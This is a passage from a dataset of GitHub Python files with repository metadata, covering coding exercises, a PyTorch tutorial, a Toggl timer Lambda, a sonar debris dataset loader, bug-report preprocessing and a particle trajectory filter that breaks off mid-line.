all_totals[9]['E'][1][0]['C']\n\n except:\n print('no kf')\n\n return total_t1_b, total_t1_m, total_t2_b, 
total_t2_m\n\n#print(finder())","repo_name":"peter80871/smart","sub_path":"melbet_parser.py","file_name":"melbet_parser.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22696679423","text":"\"\"\"\r\nDescribes the metadata database tables, which everything else requires.\r\n\"\"\"\r\n\r\nfrom .tabledef import DbTableDef\r\n\r\nMETADATA_DB_TABLES = {\r\n \"install_status\": DbTableDef(\r\n version=1,\r\n pk=[\"object_id\", \"S\", \"object_type\", \"S\"],\r\n indexes={},\r\n attributes={\r\n \"version\": \"N\",\r\n \"description\": \"B\"\r\n },\r\n stream=False\r\n )\r\n}\r\n","repo_name":"groboclown/whimbrel","sub_path":"installer/whimbrel/install/db/schema_metadata.py","file_name":"schema_metadata.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31434296939","text":"import heapq\nclass Solution:\n def topKFrequent(self, words: List[str], k: int) -> List[str]:\n answer=[]\n heap=[]\n frequency ={}\n for i in words:\n if i not in frequency:\n frequency[i] =1\n else:\n frequency[i]+=1\n for f in frequency:\n heapq.heappush(heap,[-frequency[f],f]) \n for i in range(k):\n answer.append(heapq.heappop(heap)[1])\n return answer ","repo_name":"MilkiyasGebru/Algorithms","sub_path":"0692-top-k-frequent-words/0692-top-k-frequent-words.py","file_name":"0692-top-k-frequent-words.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4578302785","text":"'''\nThis file contains the logic for reminding the user to avoid prolonged sitting.\n'''\nimport schedule\nfrom datetime import datetime, timedelta\ndef remind_avoid_sitting(app):\n current_time = datetime.now().strftime(\"%H:%M\")\n # Add your additional logic here, such as sending notifications or displaying reminders in the app\n # Schedule the next reminder\n next_reminder_time = datetime.now() + timedelta(hours=1)\n schedule.every().day.at(next_reminder_time.strftime(\"%H:%M\")).do(lambda: remind_avoid_sitting(app))\n app.reminder_label.config(text=f\"Reminder: It's {current_time}. 
Avoid prolonged sitting!\\n\" + f\"Next reminder: {next_reminder_time.strftime('%H:%M')}\")\n # Implement your logic to remind the user to avoid prolonged sitting\n# Add the missing import statement for leave_work_reminder","repo_name":"OpenBMB/ChatDev","sub_path":"WareHouse/WarmHeart_ModelBest1024_20231026180801/avoid_sitting_reminder.py","file_name":"avoid_sitting_reminder.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":17466,"dataset":"github-code","pt":"34"} +{"seq_id":"30641863289","text":"from preproce import preprocessing\nfrom prepare_da import prepare_data\nfrom modele import ARIMAModel\n\ndef main():\n \n df = preprocessing(\"C:/Users/sylva/AppData/Local/GitHubDesktop/app-3.2.0/Projet_ARIMA_2023/covid_CIV_dataset_projet.csv\")\n t_train, t_test ,t_validation, y_train, y_test, y_validation=prepare_data(df, 0.6, 0.2)\n \n print(t_train)\n print(t_test)\n print(t_validation)\n \n print(y_train)\n print(y_test)\n print(y_validation)\n model = ARIMAModel(12,1,12,t_train, t_test ,t_validation, y_train, y_test, y_validation)\n model.training()\n model.show_forcast_of_arima_model()\n\n \n \n \nif __name__==\"__main__\": \n \n main()\n \n \n ","repo_name":"Sylou2022/Projet_ARIMA_2023","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28470637866","text":"## Welcome to Pytorch\n\n## Import convention seems to be just torch as opposed to how numpy and pandas set to np/pd.\n\nimport torch\nimport numpy as np\nimport pandas as pd\n\n## torch is all about tensors. recall that a tensor is a type of matrix\n# https://medium.com/@quantumsteinke/whats-the-difference-between-a-matrix-and-a-tensor-4505fbdc576c\n\n\na = torch.Tensor([1,2,3,4,5])\nprint(a.dtype)\nprint(a.type())\nprint(a.size())\nprint(a.ndimension())\n\na_col=a.view(5,1)\n\nprint(a_col)\n\na_col=a.view(-1,1)\n\nprint(a_col)\n\na = torch.Tensor([0,1,2,3,4,5])\na_col=a.view(6,1)\nprint(a_col)\n\nnumpy_array=np.array([0.0,1.0,2.0,3.0,4.0])\ntorch_tensor=torch.from_numpy(numpy_array)\nback_to_numpy=torch_tensor.numpy()\n\nprint(numpy_array,torch_tensor,back_to_numpy)\n\npandas_series=pd.Series([0.1,2,0.3,10.1])\npandas_to_torch=torch.from_numpy(pandas_series.values)\n\nprint(pandas_series,pandas_to_torch)\n\na = torch.Tensor([0,1,2,3,4,5])\na_list = a.tolist()\nprint(a_list)\n\na = torch.Tensor([0,1,2,3,4,5])\n\nprint(a[0]) #prints a tensor\nprint(a[0].item()) # prints the number\n\nc = torch.Tensor([10,0.5,20,3])\nprint(c)\nc[0]=100\nprint(c)\nc[3]=10\nprint(c)\nd=c[1:3]\nprint(d)\nd[0]=0\nprint(d)\n\nprint(c)\nc[1:4]=torch.tensor([1,2,3])\nprint(c)\n\n#vector arithmetic\n\nu = torch.tensor([1,0])\nv = torch.tensor([0,1])\nz = u + v\nprint(z)\n\ny = torch.tensor([1,2])\nz = 2*y\nprint(z)\n\nu = torch.tensor([1, 2, 3, -1])\nv = u + 1\nprint(v)\n\nu = torch.tensor([1, 2])\nv = torch.tensor([3, 2])\nz = u*v\nprint(z)\n\n# dot product\n \nu = torch.tensor([1,2])\nv = torch.tensor([3,1])\nz = torch.dot(u,v)\nprint(z)\n\n# the act of adding a scalar to a tensor is called \"broadcasting\"\nu = torch.tensor([1,2,3,-1])\nz = u+1\nprint(z)\n\n\na = torch.tensor([1.0,-1.0,1.0,-1.0])\nmean_a = a.mean()\nprint(mean_a)\n\nb = torch.tensor([1,-2,3,4,5])\nprint(b.max())\n\npi = np.pi\nx = torch.tensor([0, pi/2, pi])\ny = torch.sin(x)\nprint(y)\n\n#return evenly spaced numbers over a specified interval\n#this is pretty neat.\nz = torch.linspace(-2,2, 
steps=5)\nprint(z)\n\nx=torch.linspace(0,2*pi,100)\ny=torch.sin(x)\n\nimport matplotlib.pyplot as plt\nplt.plot(x.numpy(),y.numpy())\n","repo_name":"nwalker85/coursera-ibm-ai","sub_path":"Course4/Week1/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6438819718","text":"#Given two strings, return True if either of the strings appears at the very end of the other string, ignoring upper/lower case differences (in other words, the computation should not be \"case sensitive\"). Note: s.lower() returns the lowercase version of a string.\r\n#end_other('Hiabc', 'abc') → True\r\n#end_other('AbC', 'HiaBc') → True\r\n#end_other('abc', 'abXabc') → True\r\ndef end_other(string1,string2):\r\n num1 = len(string1)\r\n num2 = len(string2)\r\n string1 = string1.lower()\r\n string2 = string2.lower()\r\n if string1[num2:] == string2[:]:\r\n return True\r\n elif string2[num1:] == string1[:]:\r\n return True\r\n else:\r\n return False\r\nprint('Enter the two string')\r\nstring1 = str(input())\r\nstring2 = str(input())\r\nprint(str(end_other(string1,string2)))\r\n","repo_name":"naveenkewalramani/Coding-Bat-Solutions","sub_path":"coding bat/string2/String_2_end_other.py","file_name":"String_2_end_other.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14393733449","text":"\"\"\"\n1 - Faça um programa que leia um número inteiro e o imprima.\n\"\"\"\n\nnumero_inteiro = int(input(\"Digite um número: \"))\nprint(numero_inteiro)\n\n\"\"\"\n2 - Faça um programa que leia um número real e o imprima.\n\"\"\"\n\nnumero_real = float(input(\"Digite um numero: \"))\nprint(numero_real)\n\n\"\"\"\n3 - Peça ao usuário para digitar três valores inteiros e imprima a soma deles.\n\"\"\"\n\nnumero1 = int(input(\"Digite o primeiro número: \"))\nnumero2 = int(input(\"Digite o segundo número: \"))\nnumero3 = int(input(\"Digite o terceiro número: \"))\nsoma = numero1 + numero2 + numero3\n\nprint('\\n',soma)\n\n\"\"\"\n4 - Leia um numero real e imprima o resultado do quadrado desse número.\n\"\"\"\n\nquadrado = float(input(\"Digite um número: \"))\nqd = quadrado ** 2\n\nprint('\\n',qd)\n\n\"\"\"\n5 - Leia um número real e imprima a quinta parte deste número.\n\"\"\"\n\nnumero = float(input(\"Digite um número: \"))\nquinta_parte = numero // 5\n\nprint('\\n',quinta_parte)\n\n","repo_name":"cristinamais/exercicios_python","sub_path":"Exercicios Variaveis e tipos de dados/exercicio 01 seção 04.py","file_name":"exercicio 01 seção 04.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14494506274","text":"f = open(\"../input/day10input.txt\", \"r\")\n# f = open(\"testinput/day10test.txt\", \"r\")\nlines = [int(l.strip()) for l in f.readlines()]\nlines.append(0)\nlines = sorted(lines)\nlines.append(max(lines) + 3)\n\none_diff = 0\nthree_diff = 0\n\nfor i in range(len(lines) - 1):\n delta = lines[i + 1] - lines[i]\n if delta == 1:\n one_diff += 1\n elif delta == 3:\n three_diff += 1\n\nmemo = {}\n\n\ndef dp(n):\n if n == len(lines) - 1:\n return 1\n if n in memo:\n return memo[n]\n ans = 0\n for j in range(n + 1, len(lines)):\n if lines[j] - lines[n] <= 3:\n ans += dp(j)\n memo[n] = ans\n return ans\n\n\nprint(\"part1\", one_diff * three_diff)\nprint(\"part2\", 
dp(0))\n","repo_name":"ra-res/advent-of-code-2020","sub_path":"src/Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20932964655","text":"import json\nimport os\n\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nformatter = logging.Formatter('[%(levelname)s | %(name)s:%(lineno)d] %(message)s')\nhandler = logging.StreamHandler()\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\n\ndef lambda_handler(event, context):\n # The event parameter is a dict containing the message payload\n logger.info(\"Received event: \" + json.dumps(event))\n\n previous_state = event.get('previous', {}).get('state', {}).get('desired', {}).get('timer_state', '')\n new_state = event.get('current', {}).get('state', {}).get('desired', {}).get('timer_state', '')\n\n if previous_state and new_state and (previous_state != new_state):\n logger.info(\"New desired state reported: \" + json.dumps(new_state))\n\n TOGGL_WID = int(os.getenv('TOGGL_WID'))\n from toggl_api_utils import start_timer, stop_timer\n\n description = ''\n\n # If the timer_state is 'STOPPED' - stop a timer on Toggl\n if new_state in ['STOPPED', 'PAUSED', 'REST']:\n logger.info(\"The device timer is now STOPPED/PAUSED/REST - stop the Toggl\")\n result = stop_timer(TOGGL_WID)\n logger.info(f'stop_timer result:{result}')\n elif new_state == 'POMODORO':\n logger.info(\"The device timer is now POMODORO - start the Toggl\")\n project_name, color = start_timer(TOGGL_WID)\n logger.info(f'start_timer {project_name}')\n description = project_name\n if not description:\n description = ''\n else:\n logger.info(f\"The device timer is now {new_state} - do nothing\")\n\n # Update the device shadow\n THING_NAME = os.getenv('THING_NAME')\n payload = {\n \"state\" : {\n \"desired\": {\n \"description\" : description\n },\n \"reported\": {\n \"description\" : description\n }\n }\n }\n logger.info(f\"Updating device shadow with description payload: {payload}\")\n from mqtt_utils import update_device_shadow\n update_device_shadow(THING_NAME, payload)\n\n # Return a success response\n return {'status': 'success'}\n","repo_name":"ChistokhinSV/M5Pomodoro","sub_path":"toggl-webhook/timer_lambda/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43340333915","text":"student_name = []\nmath_marks = []\nscience_marks = []\nhindi_marks = []\nenglish_marks = []\ncomputer_marks = []\nfinal = []\nfor i in range(1,11):\n name = input(\"Enter name of {}th student: \".format(i))\n student_name.append(name)\n math = int(input(\"Enter math marks: \"))\n math_marks.append(math)\n science = int(input(\"Enter Science Marks: \"))\n science_marks.append(science)\n hindi = int(input(\"Enter Hindi Marks: \"))\n hindi_marks.append(hindi)\n english = int(input(\"Enter English Marks: \"))\n english_marks.append(english)\n computer = int(input(\"Enter Computer Marks: \"))\n computer_marks.append(computer)\n final.append(name)\n final.append(math)\n final.append(science)\n final.append(hindi)\n final.append(english)\n final.append(computer)\nchoice = int(input(\"Which student's marks you want to see?(1 to 10): \"))\nj = 6*(choice-1)\nprint(\"{} has {} marks in Maths, {} marks in Science, {} marks in Hindi, {} marks in English, {} marks in 
Computer\".format(final[j],final[j+1],final[j+2],final[j+3],final[j+4],final[j+5]))","repo_name":"himanshu-957/30DaysofPython","sub_path":"Day02/StudentInfo.py","file_name":"StudentInfo.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29901951897","text":"import numpy as np\nimport cv2\n\nimport os\nimport glob\nimport pathlib\n\nOBJECT_CLASES = [\n \"bottle\",\n \"can\",\n \"carton\",\n \"box\",\n \"bidon\",\n \"pipe\",\n \"platform\",\n \"propeller\",\n \"sachet\",\n \"tire\",\n \"valve\",\n \"wrench\"\n]\n\nMATERIAL_CLASSES = [\n \"plastic\",\n \"metal\",\n \"rubber\",\n \"glass\",\n \"cardboard\",\n \"platform\"\n]\n\nMATERIAL_OBJECT_MAPPING = {\n \"plastic\": [\"drink-sachet\", \"plastic-bidon\", \"plastic-bottle\", \"plastic-pipe\", \"plastic-propeller\"],\n \"metal\": [\"can\", \"metal-bottle\", \"metal-box\", \"valve\", \"wrench\"],\n \"rubber\": [\"large-tire\", \"small-tire\"],\n \"glass\": [\"brown-glass-bottle\", \"glass-bottle\", \"glass-jar\", \"potion-glass-bottle\"],\n \"cardboard\": [\"drink-carton\"],\n \"platform\": [\"rotating-platform\"]\n}\n\nOBJECT_CLASS_MAPPING = {\n \"bottle\": [\"plastic-bottle\", \"metal-bottle\", \"glass-bottle\", \"potion-glass-bottle\"],\n \"can\": [\"can\"],\n \"carton\": [\"drink-carton\"],\n \"box\": [\"metal-box\"],\n \"bidon\": [\"plastic-bidon\"],\n \"pipe\": [\"plastic-pipe\"],\n \"platform\": [\"rotating-platform\"],\n \"propeller\": [\"plastic-propeller\"],\n \"sachet\": [\"drink-sachet\"],\n \"tire\": [\"large-tire\", \"small-tire\"],\n \"valve\": [\"valve\"],\n \"wrench\": [\"wrench\"]\n}\n\nINDIVIDUAL_OBJECT_CLASSES = [\n \"brown-glass-bottle\", \"drink-carton\", \"glass-bottle\", \"large-tire\", \"metal-box\", \"plastic-bottle\", \"plastic-propeller\", \"rotating-platform\", \"valve\", \"can\",\n \"drink-sachet\", \"glass-jar\", \"metal-bottle\", \"plastic-bidon\", \"plastic-pipe\", \"potion-glass-bottle\", \"small-tire\", \"wrench\"\n]\n\nTURNTABLE_DATA_FOLDER = os.path.join(pathlib.Path(__file__).parent.absolute() ,\"data/turntable-cropped\")\n\nVALID_DATASETS = [\"turntable\"]\nVALID_CROPS = [\"platform\", \"object\"]\nVALID_TASKS = [\"object_classes\", \"individual_objects\", \"materials\"]\n\nSPLIT_SEED = 42\n\ndef load_debris_dataset(dataset=\"turntable\", task=\"object_classes\", crop=\"platform\", image_size = (96, 96), split=None, add_channels_dim=True):\n \"\"\"\n Loads the dataset from disk and returns all images in the specified task.\n\n Valid tasks are:\n - object_classes Classes correspond to the high level objects like can, bottle, tire, valve, wrench, etc.\n - individual_objects Individual objects are each its own class (18 in total).\n - materials Classes correspond to the physical materials in the objects (like plastic, metal, rubber, glass, cardboard)\n\n Valid crops can be:\n - platform Use image crops containing both the rotating platform and the object.\n - object Use image crops only containing the object.\n \"\"\"\n\n assert dataset in VALID_DATASETS\n assert task in VALID_TASKS\n assert crop in VALID_CROPS\n\n if task == \"object_classes\":\n object_images, object_labels = load_turntable_objects(OBJECT_CLASS_MAPPING, OBJECT_CLASES, image_size, crop)\n\n return make_split(object_images, object_labels, split)\n\n if task == \"individual_objects\":\n object_images, object_labels = load_turntable_objects({x: x for x in INDIVIDUAL_OBJECT_CLASSES},\n INDIVIDUAL_OBJECT_CLASSES, image_size, crop)\n\n return 
make_split(object_images, object_labels, split)\n\n if task == \"materials\":\n object_images, object_labels = load_turntable_objects(MATERIAL_OBJECT_MAPPING, MATERIAL_CLASSES, image_size, crop)\n\n return make_split(object_images, object_labels, split)\n\n raise NotImplementedError()\n\ndef class_names(dataset, task):\n pass\n\ndef make_split(object_images, object_labels, split_type, random_seed=None, add_channels_dim=True):\n if split_type is None:\n x_all = np.concatenate(object_images, axis=0)\n y_all = np.concatenate(object_labels, axis=0)\n\n if add_channels_dim:\n x_all = np.expand_dims(x_all, axis=3)\n\n return x_all, y_all\n\n if split_type == \"70/30\":\n from sklearn.model_selection import train_test_split\n\n x_all = np.concatenate(object_images, axis=0)\n y_all = np.concatenate(object_labels, axis=0)\n\n x_train, x_test, y_train, y_test = train_test_split(x_all, y_all, shuffle=True, test_size=0.3, random_state=SPLIT_SEED)\n\n if add_channels_dim:\n x_train = np.expand_dims(x_train, axis=3)\n x_test = np.expand_dims(x_test, axis=3)\n\n return x_train, y_train, x_test, y_test\n\n #if split_type == \"sequence\":\n \n\ndef load_turntable_objects(dataset_map, class_names, size, crop):\n object_images, object_labels = [], []\n\n for class_name, objects in dataset_map.items():\n for object_name in objects:\n obj_images = load_turntable_individual_object(object_name, size, crop)\n label = class_names.index(class_name)\n\n for obj in obj_images:\n object_images.append(obj)\n object_labels.append([label] * len(obj))\n\n return object_images, object_labels\n\ndef load_turntable_individual_object(object_name, size, crop=\"platform\"):\n \"\"\"\n Loads all images for a particular object in the dataset.\n \"\"\"\n \n assert crop in VALID_CROPS\n\n standing_glob_pattern = \"{}/{}/{}-standing-frame-*.png\".format(TURNTABLE_DATA_FOLDER, object_name, crop)\n sideways_glob_pattern = \"{}/{}/{}-sideways-frame-*.png\".format(TURNTABLE_DATA_FOLDER, object_name, crop)\n\n standing_files = glob.glob(standing_glob_pattern)\n sideways_files = glob.glob(sideways_glob_pattern)\n\n standing_num_files = len(standing_files)\n sideways_num_files = len(sideways_files)\n\n standing_file_pattern = \"{}/{}/{}-standing-frame-{:03}.png\"\n sideways_file_pattern = \"{}/{}/{}-sideways-frame-{:03}.png\"\n\n standing_images = []\n sideways_images = []\n\n for i in range(standing_num_files):\n filepath = standing_file_pattern.format(TURNTABLE_DATA_FOLDER, object_name, crop, i)\n image = cv2.imread(filepath, flags=cv2.IMREAD_GRAYSCALE)\n image = cv2.resize(image, dsize=size, interpolation=cv2.INTER_LINEAR)\n\n standing_images.append(image)\n\n for i in range(sideways_num_files):\n filepath = sideways_file_pattern.format(TURNTABLE_DATA_FOLDER, object_name, crop, i)\n image = cv2.imread(filepath, flags=cv2.IMREAD_GRAYSCALE)\n image = cv2.resize(image, dsize=size, interpolation=cv2.INTER_LINEAR)\n\n sideways_images.append(image)\n\n if standing_num_files > 0 and sideways_num_files > 0:\n return [np.array(standing_images), np.array(sideways_images)]\n\n if standing_num_files > 0 and sideways_num_files == 0:\n return [np.array(standing_images)]\n\n if sideways_num_files > 0 and standing_num_files == 0:\n return [np.array(sideways_images)]\n\n raise ValueError(\"No images 
found\")","repo_name":"mvaldenegro/marine-debris-fls-datasets","sub_path":"md_fls_dataset/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"34"} +{"seq_id":"36098826887","text":"import argparse\nimport cPickle as pickle\nimport json\nimport os\nimport random\nimport re\nfrom collections import defaultdict\n\nimport nltk\nfrom tqdm import tqdm\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-d', '--data', type=str, default='../data/eclipse')\nparser.add_argument('-r', '--ratio', type=float, default=0.9)\nparser.add_argument('-wv', '--word_vocab', type=int, default=20000)\nparser.add_argument('-cv', '--char_vocab', type=int, default=100)\nargs = parser.parse_args()\n\nUNK = 1\n\ndef read_pairs():\n bug_pairs = []\n bug_ids = set()\n with open(os.path.join(args.data, 'pairs.json'), 'r') as f:\n count = 0\n for line in f:\n count += 1\n if count > 10000:\n break\n\n pair = json.loads(line)\n bug_pairs.append((int(pair['bug1']), int(pair['bug2'])))\n bug_ids.add(int(pair['bug1']))\n bug_ids.add(int(pair['bug2']))\n with open(os.path.join(args.data, 'bug_pairs.txt'), 'w') as f:\n for pair in bug_pairs:\n f.write(\"%d %d\\n\" % pair)\n bug_ids = sorted(bug_ids)\n with open(os.path.join(args.data, 'bug_ids.txt'), 'w') as f:\n for bug_id in bug_ids:\n f.write(\"%d\\n\" % bug_id)\n return bug_pairs, bug_ids\n\n\ndef func_name_tokenize(text):\n s = []\n for i, c in enumerate(text):\n if c.isupper() and i > 0 and text[i-1].islower():\n s.append(' ')\n s.append(c)\n return ''.join(s).strip()\n\n\ndef normalize_text(text):\n try:\n tokens = re.compile(r'[\\W_]+', re.UNICODE).split(text)\n text = ' '.join([func_name_tokenize(token) for token in tokens])\n text = re.sub(r'\\d+((\\s\\d+)+)?', 'number', text)\n except:\n return 'description'\n return ' '.join([word.lower() for word in nltk.word_tokenize(text)])\n\n\ndef save_dict(set, filename):\n with open(os.path.join(args.data, filename), 'w') as f:\n for i, item in enumerate(set):\n f.write('%s\\t%d\\n' % (item, i))\n\n\ndef load_dict(filename):\n dict = {}\n with open(os.path.join(args.data, filename), 'r') as f:\n for line in f:\n tokens = line.split('\\t')\n dict[tokens[0]] = tokens[1]\n return dict\n\n\ndef normalized_data(bug_ids):\n products = set()\n bug_severities = set()\n priorities = set()\n versions = set()\n components = set()\n bug_statuses = set()\n text = []\n normalized_bugs = open(os.path.join(args.data, 'normalized_bugs.json'), 'w')\n with open(os.path.join(args.data, 'bugs.json'), 'r') as f:\n count = 0\n loop = tqdm(f)\n for line in loop:\n bug = json.loads(line)\n bug_id = int(bug['bug_id'])\n if bug_id not in bug_ids:\n continue\n\n count += 1\n loop.set_postfix(count=count)\n\n products.add(bug['product'])\n bug_severities.add(bug['bug_severity'])\n priorities.add(bug['priority'])\n versions.add(bug['version'])\n components.add(bug['component'])\n bug_statuses.add(bug['bug_status'])\n bug['description'] = normalize_text(bug['description'])\n if 'short_desc' in bug:\n bug['short_desc'] = normalize_text(bug['short_desc'])\n else:\n bug['short_desc'] = ''\n bug.pop('_id', None)\n bug.pop('delta_ts', None)\n bug.pop('creation_ts', None)\n normalized_bugs.write('{}\\n'.format(json.dumps(bug)))\n\n text.append(bug['description'])\n text.append(bug['short_desc'])\n save_dict(products, 'product.dic')\n save_dict(bug_severities, 'bug_severity.dic')\n save_dict(priorities, 'priority.dic')\n 
save_dict(versions, 'version.dic')\n save_dict(components, 'component.dic')\n save_dict(bug_statuses, 'bug_status.dic')\n return text\n\n\ndef data_split(bug_pairs):\n random.shuffle(bug_pairs)\n split_idx = int(len(bug_pairs) * args.ratio)\n with open(os.path.join(args.data, 'train.txt'), 'w') as f:\n for pair in bug_pairs[:split_idx]:\n f.write(\"%d %d\\n\" % pair)\n test_data = {}\n for pair in bug_pairs[split_idx:]:\n bug1 = int(pair[0])\n bug2 = int(pair[1])\n if bug1 not in test_data:\n test_data[bug1] = set()\n test_data[bug1].add(bug2)\n with open(os.path.join(args.data, 'test.txt'), 'w') as f:\n for bug in test_data.keys():\n f.write(\"{} {}\\n\".format(bug, ' '.join([str(x) for x in test_data[bug]])))\n\n\ndef build_freq_dict(train_text):\n print('building frequency dictionaries')\n word_freq = defaultdict(int)\n char_freq = defaultdict(int)\n for text in tqdm(train_text):\n for word in text.split():\n word_freq[word] += 1\n for char in text:\n char_freq[char] += 1\n return word_freq, char_freq\n\n\ndef save_vocab(freq_dict, vocab_size, filename):\n top_tokens = sorted(freq_dict.items(), key=lambda x: -x[1])[:vocab_size - 2]\n print('most common token is %s which appears %d times' % (top_tokens[0][0], top_tokens[0][1]))\n print('less common token is %s which appears %d times' % (top_tokens[-1][0], top_tokens[-1][1]))\n vocab = {}\n i = 2 # 0-index is for padding, 1-index is for UNKNOWN\n for j in range(len(top_tokens)):\n vocab[top_tokens[j][0]] = i\n i += 1\n with open(os.path.join(args.data, filename), 'wb') as f:\n pickle.dump(vocab, f)\n return vocab\n\n\ndef build_vocabulary(train_text):\n word_freq, char_freq = build_freq_dict(train_text)\n print('word vocabulary')\n word_vocab = save_vocab(word_freq, args.word_vocab, 'word_vocab.pkl')\n print('character vocabulary')\n char_vocab = save_vocab(char_freq, args.char_vocab, 'char_vocab.pkl')\n return word_vocab, char_vocab\n\n\ndef dump_bugs(word_vocab, char_vocab):\n bug_dir = os.path.join(args.data, 'bugs')\n if not os.path.exists(bug_dir):\n os.mkdir(bug_dir)\n product_dict = load_dict('product.dic')\n bug_severity_dict = load_dict('bug_severity.dic')\n priority_dict = load_dict('priority.dic')\n version_dict = load_dict('version.dic')\n component_dict = load_dict('component.dic')\n bug_status_dict = load_dict('bug_status.dic')\n with open(os.path.join(args.data, 'normalized_bugs.json'), 'r') as f:\n loop = tqdm(f)\n for line in loop:\n loop.set_description('Data dumping')\n bug = json.loads(line)\n bug['product'] = product_dict[bug['product']]\n bug['bug_severity'] = bug_severity_dict[bug['bug_severity']]\n bug['priority'] = priority_dict[bug['priority']]\n bug['version'] = version_dict[bug['version']]\n bug['component'] = component_dict[bug['component']]\n bug['bug_status'] = bug_status_dict[bug['bug_status']]\n bug['description_word'] = [word_vocab.get(w, UNK) for w in bug['description'].split()]\n bug['description_char'] = [char_vocab.get(c, UNK) for c in bug['description']]\n if len(bug['short_desc']) == 0:\n bug['short_desc'] = bug['description'][:10]\n bug['short_desc_word'] = [word_vocab.get(w, UNK) for w in bug['short_desc'].split()]\n bug['short_desc_char'] = [char_vocab.get(c, UNK) for c in bug['short_desc']]\n bug.pop('description')\n bug.pop('short_desc')\n with open(os.path.join(bug_dir, bug['bug_id'] + '.pkl'), 'wb') as f:\n pickle.dump(bug, f)\n\n\ndef main():\n bug_pairs, bug_ids = read_pairs()\n print(\"Number of bugs: {}\".format(len(bug_ids)))\n print(\"Number of pairs: {}\".format(len(bug_pairs)))\n\n 
data_split(bug_pairs)\n text = normalized_data(bug_ids)\n\n word_vocab, char_vocab = build_vocabulary(text)\n dump_bugs(word_vocab, char_vocab)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tqtg/DuplicateBugFinder","sub_path":"data_prepare.py","file_name":"data_prepare.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"34383704399","text":"\"\"\"\nthis script is used to filter the trajectories and get the velocity, impact energy, hoop length, hoop height\ninput file is the csv file we get from tracking particles\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport scipy.ndimage\n\n\nsaving_folder = 'Q:\\\\test\\\\1\\\\trajectory_filter'\nif not os.path.exists(saving_folder):\n os.makedirs(saving_folder)\ncsvfile = \"Q:\\\\test\\\\1\\\\crop&change\\\\data.csv\"\nframerate = 160\nmass = 1\nscale = 35/2.4\n\n\n\ndf1 = pd.read_csv(csvfile)\ndf1 = df1.sort_values(by=['particle', 'frame'])\ntemp = []\nfor row in df1.iterrows():\n index, data = row\n temp.append(data.tolist())\ntemp = np.array(temp)\nbegin = 0\nend = 0\nf = open(saving_folder+'\\\\''data.txt', 'a')\nf.write(csvfile+'\\n')\nf.write('particle\\tx_1\\ty_1\\tx_2\\ty_2\\tx_3\\ty_3\\tx_4\\ty_4\\tv_1x\\tx_1y\\tv_2x\\tx_2y\\timpact_angle\\treflection_angle\\timpact_energy\\thoop_length\\thoop_height\\n')\nfor i in range(len(temp)):\n sequence = temp[begin][10]\n if i+1 == len(temp) or sequence != temp[i+1][10]:\n low_x = []\n low_y = []\n number = []\n impact_x = []\n impact_y = []\n impact_number = []\n end = i\n plt.title(str(int(temp[begin][10])))\n plt.xlim(0, 1000)\n plt.ylim(120, 0)\n filtered = scipy.ndimage.gaussian_filter(temp[begin:end, 1], 2)\n for j in range(2,len(filtered)-2):\n if filtered[j]>=filtered[j-2] and filtered[j]>=filtered[j+2]:\n low_x.append(temp[begin + j][2])\n low_y.append(filtered[j])\n number.append(begin+j)\n for j in range(1, len(number)):\n if number[len(number)-j] == number[len(number)-j-1]+1 and low_y[len(number)-j]>70:\n if temp[number[j - 1]][2]>=500 or temp[number[j - 1]][2]<=500: # this order need to be gotten rid of if the glass are changed\n f.write(str(int(temp[begin][10])) + '\\t')\n f.write(str(temp[number[len(number) - j - 1] - 2][2] / scale) + '\\t' +\n str(filtered[number[len(number) - j - 1] - 2-begin] / scale) + '\\t' +\n str(temp[number[len(number) - j] - 1][2] / scale) + '\\t' +\n str(filtered[number[len(number) - j - 1]-begin] / scale) + '\\t' +\n str(temp[number[len(number) - j]][2] / scale) + '\\t' +\n str(filtered[number[len(number) - j]-begin] / scale) + '\\t' +\n str(temp[number[len(number) - j] + 2][2] / scale) + '\\t' +\n str(filtered[number[len(number) - j]-begin + 2] / scale) + '\\t')\n v_1x = abs(temp[number[len(number) - j - 1] - 2][2] - temp[number[len(number) - j] - 1][2]) / 2 * framerate / scale\n v_1y = abs(filtered[number[len(number) - j - 1] - 2-begin] - filtered[number[len(number) - j - 1]-begin]) / 2 * framerate / scale\n v_2x = abs(temp[number[len(number) - j]][2]-temp[number[len(number) - j] + 2][2]) / 2 * framerate / scale\n v_2y = abs(filtered[number[len(number) - j]-begin] - filtered[number[len(number) - j]-begin + 